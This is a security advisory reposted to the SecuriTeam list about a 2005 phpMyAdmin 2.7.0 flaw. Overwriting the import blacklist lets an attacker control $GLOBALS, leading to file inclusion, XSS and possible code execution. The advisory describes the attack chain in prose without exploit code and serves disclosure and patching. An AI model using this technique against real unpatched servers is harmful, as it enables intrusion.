[UNIX] phpMyAdmin Variable Overwrite Vulnerability

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



phpMyAdmin Variable Overwrite Vulnerability
------------------------------------------------------------------------


SUMMARY

<http://www.phpmyadmin.net> phpMyAdmin is "a tool written in PHP intended
to handle the administration of MySQL over the Web". A quick audit of the
variable overwrite protection that was redesigned for phpMyAdmin 2.7.0
revealed an easy to exploit flaw, that leads to total failure of the
protection and therefore opens phpMyAdmin to a number of XSS, local and
remote file inclusion vulnerabilities.

DETAILS

Vulnerable Systems:
* phpMyAdmin version 2.7.0(-rc1)

phpMyAdmin comes with a register_globals emulation layer within
grab_globals.php, to ensure compatibility with hosts where this feature is
turned off. This layer was heavily modified for the release of phpMyAdmin
2.7.0. One of the major changes is, that the blacklist of variables that
may not be overwritten by the emulation layer is now stored in a global
variable.

Unfortunately the variablename $import_blacklist is not covered by the
protection and therefore it was possible for an attacker to overwrite the
blacklist. After the blacklist is overwritten an attacker can f.e.
overwrite the $GLOBALS array with arbitrary content and therefore exploit
several places where the $GLOBALS array is used.

During normal execution this $GLOBALS array is just another way to access
global variables, but when a script overwrites it, it becomes a normal
variable, with a few exceptions in PHP4. For more information about what
unexpected things can happen when $GLOBALS is overwritten please have a
look at
<http://www.hardened-php.net/globals-problem>
http://www.hardened-php.net/globals-problem

In phpMyAdmin $GLOBALS is used f.e. in the CSS generator to access the
global variable that stores the configuration. Due to the fact, that the
content of this variable is under total control of the attacker the path
to an included file can be injected. This leads to an remote URL include
vulnerability in PHP5 and a local file include vulnerability in PHP4.

The difference is caused by the fact, that the PHP function file_exists()
does not work on URL wrappers within PHP4, but works on ftp:// URLs in
PHP5. (When the host is running our Hardening-Patch for PHP such a remote
URL inclusion is of course not allowed and logged).

Please also note that there are multiple (easy) ways to get PHP code into
files on the server, so that local file inclusion vulnerabilities are more
dangerous than they seem. Additionally it is possible to directly include
PEAR.php from the installed PHP distribution. If it is one that was
shipped with PHP <= 4.3.10 this can be used to directly execute code on
the server by manipulating the destructor list.

There are other places in phpMyAdmin, where this vulnerability can lead to
XSS and other local file inclusion vulnerabilities. Those will not be
listed separately, because the problem mentioned above is already serious
enough to demonstrate the impact of the failing overwrite protection.

Disclosure Timeline:
6. December 2005 - Disclosed vulnerability to vendor
7. December 2005 - Release of new phpMyAdmin version
7. December 2005 - Public Disclosure

Recommendation:
It is strongly recommended to upgrade to the new version of phpMyAdmin
which you can download at:
<http://www.phpmyadmin.net/home_page/downloads.php>
http://www.phpmyadmin.net/home_page/downloads.php


ADDITIONAL INFORMATION

The information has been provided by <mailto:sesser@xxxxxxxxxxxxxxxx>
Stefan Esser.
The original article can be found at:
<http://www.hardened-php.net/advisory_252005.110.html>
http://www.hardened-php.net/advisory_252005.110.html



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages